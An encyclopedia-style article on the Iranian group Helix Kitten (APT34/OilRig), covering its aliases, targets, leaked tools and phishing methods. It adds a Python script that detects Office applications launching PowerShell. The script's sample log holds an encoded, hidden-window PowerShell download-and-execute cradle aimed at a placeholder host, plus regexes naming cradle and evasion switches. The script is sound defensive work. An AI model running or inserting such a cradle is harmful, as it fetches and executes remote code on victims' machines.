Helix Kitten

{{Short description|Iranian hacker group}}

{{Infobox Organization

| name = Helix Kitten

| native_name = بچه گربه هلیکس

| native_name_lang = Persian

| named_after =

| image =

| alt =

| formation = {{circa}} 2004–2007{{ref|a}}

| type = Advanced persistent threat

| purpose = Cyberespionage, cyberwarfare

| motto =

| headquarters =

| region =

| methods = Zero-days, spearphishing, malware

| membership =

| leader_name =

| language = Persian

| parent_organization =

| affiliations = APT33

| formerly = APT34

| website =

| remarks =

}}

Helix Kitten (also known as APT34 by FireEye, OilRig, Crambus, Cobalt Gypsy, Hazel Sandstorm,{{cite web |title=How Microsoft names threat actors |url=https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming |publisher=Microsoft |access-date=21 January 2024}} or EUROPIUM){{cite web | url=https://thehackernews.com/2023/12/iranian-state-sponsored-oilrig-group.html?m=1 | title=Iranian State-Sponsored OilRig Group Deploys 3 New Malware Downloaders }} is a hacker group that CrowdStrike has identified as Iranian.{{cite magazine |magazine=Wired |title=APT 34 Is an Iran-Linked Hacking Group That Probes Critical Infrastructure |url=https://www.wired.com/story/apt-34-iranian-hackers-critical-infrastructure-companies/ |archive-url=https://web.archive.org/web/20171210144943/https://www.wired.com/story/apt-34-iranian-hackers-critical-infrastructure-companies/ |archive-date=December 10, 2017 |first=Lily Hay |last=Newman |date=December 7, 2017}}{{cite news |url=https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html |publisher=FireEye |title=New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit |date=December 7, 2017 |archive-date=December 10, 2017 |archive-url=https://web.archive.org/web/20171210145601/https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html |first1=Manish |last1=Sardiwal |first2=Yogesh |last2=Londhe |first3=Nalani |last3=Fraser |first4=Nicholas |last4=Fraser |first5=Jaqueline |last5=O'Leary |first6=Vincent |last6=Cannon}}

History

The group has reportedly been active since at least 2014. According to John Hultquist of FireEye, it has targeted many of the same organizations as APT33.

In April 2019, the source code of several of APT34's cyber-espionage tools, together with data on its victims, was leaked through a Telegram channel.{{cite web|url=https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/ |title=Source code of Iranian cyber-espionage tools leaked on Telegram; APT34 hacking tools and victim data leaked on a secretive Telegram channel since last month. |author=Catalin Cimpanu |date=April 17, 2019 |website= ZDNet|publisher= |access-date=April 24, 2019}}{{cite web | url=https://www.cyberscoop.com/oilrig-leak-iran-telegram-helix-kitten/ | title=How companies – and the hackers themselves – could respond to the OilRig leak | date=18 April 2019 }}

Targets

The group has reportedly targeted organizations, mainly in the Middle East, in the financial, energy, telecommunications and chemical industries, as well as operators of critical infrastructure.

Techniques

APT34 reportedly gains initial access through spearphishing and other social engineering, delivering malicious Microsoft Office documents (including Excel files carrying macros, and documents exploiting CVE-2017-11882) that install PowerShell-based backdoors.
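The intrusion chain described above (an Office document whose macro launches PowerShell, typically hidden and with an encoded command) leaves a distinctive parent-child process trace on the endpoint. The following detection script is an added illustration written for this article; it is not code from the group, from FireEye, or from any cited source. It assumes process-creation events logged as newline-delimited JSON with Sysmon-style field names (Image, ParentImage, CommandLine, User); the sample events, user name and URL are constructed for the example.

```python
"""Flag PowerShell launched by an Office application, the trace a macro-borne
loader leaves behind. Added example; the events below are constructed."""
import base64
import json
import re

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# -EncodedCommand and its documented abbreviations; longest alternative first
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
# Download-and-execute cradles commonly seen in macro stagers
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                    r"invoke-expression|\biex\b|net\.webclient", re.I)
# Switches used to keep the console invisible and skip policy/profile
EVASION = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile|"
                     r"-ep\s+bypass|-executionpolicy\s+bypass", re.I)


def encode_command(script: str) -> str:
    """Build an -EncodedCommand argument as PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an encoded command."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # truncated or not really base64
        return None


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def assess_event(event: dict):
    """Score one process-creation event; None means it is not of interest."""
    parent, image = _basename(event.get("ParentImage", "")), _basename(event.get("Image", ""))
    if image not in POWERSHELL or parent not in OFFICE_PARENTS:
        return None
    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    score, reasons = 1, [f"{parent} spawned {image}"]
    if decoded is not None:
        score, reasons = score + 1, reasons + ["encoded command"]
    # Inspect the decoded script when present, the raw command line otherwise
    if CRADLE.search(decoded if decoded is not None else cmdline):
        score, reasons = score + 1, reasons + ["download/execute cradle"]
    if EVASION.search(cmdline):
        score, reasons = score + 1, reasons + ["hidden window / policy bypass"]
    return {"user": event.get("User", ""), "parent": parent, "image": image,
            "score": score, "reasons": reasons, "decoded": decoded}


def hunt(ndjson: str) -> list:
    """Run assess_event over newline-delimited JSON and return the hits in order."""
    hits = []
    for line in ndjson.splitlines():
        if line.strip():
            verdict = assess_event(json.loads(line))
            if verdict is not None:
                hits.append(verdict)
    return hits


# Constructed sample log: one macro-style launch, one benign admin script,
# one Office-spawned PowerShell with nothing else suspicious about it.
_PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/u.txt')"
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"Image": _PS, "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE",
     "CommandLine": f"powershell.exe -NoP -W Hidden -Enc {encode_command(_STAGER)}",
     "User": "CORP\\jdoe"},
    {"Image": _PS, "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe -File C:\\Scripts\\backup.ps1", "User": "CORP\\admin"},
    {"Image": _PS, "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "CommandLine": "powershell.exe -Command Get-Date", "User": "CORP\\jdoe"},
])

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(hit["score"], hit["user"], "; ".join(hit["reasons"]))
        if hit["decoded"]:
            print("    decoded:", hit["decoded"])
```

The parent-process check is what makes the rule cheap and robust: an Office application has almost no legitimate reason to start PowerShell, so the base condition alone is worth an alert, and the encoded-command, cradle and evasion-switch checks only raise the priority. Decoding the -EncodedCommand argument before matching matters because the URL and cradle never appear in the raw command line.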

References

{{reflist}}

{{Hacking in the 2010s}}

Category:Iranian advanced persistent threat groups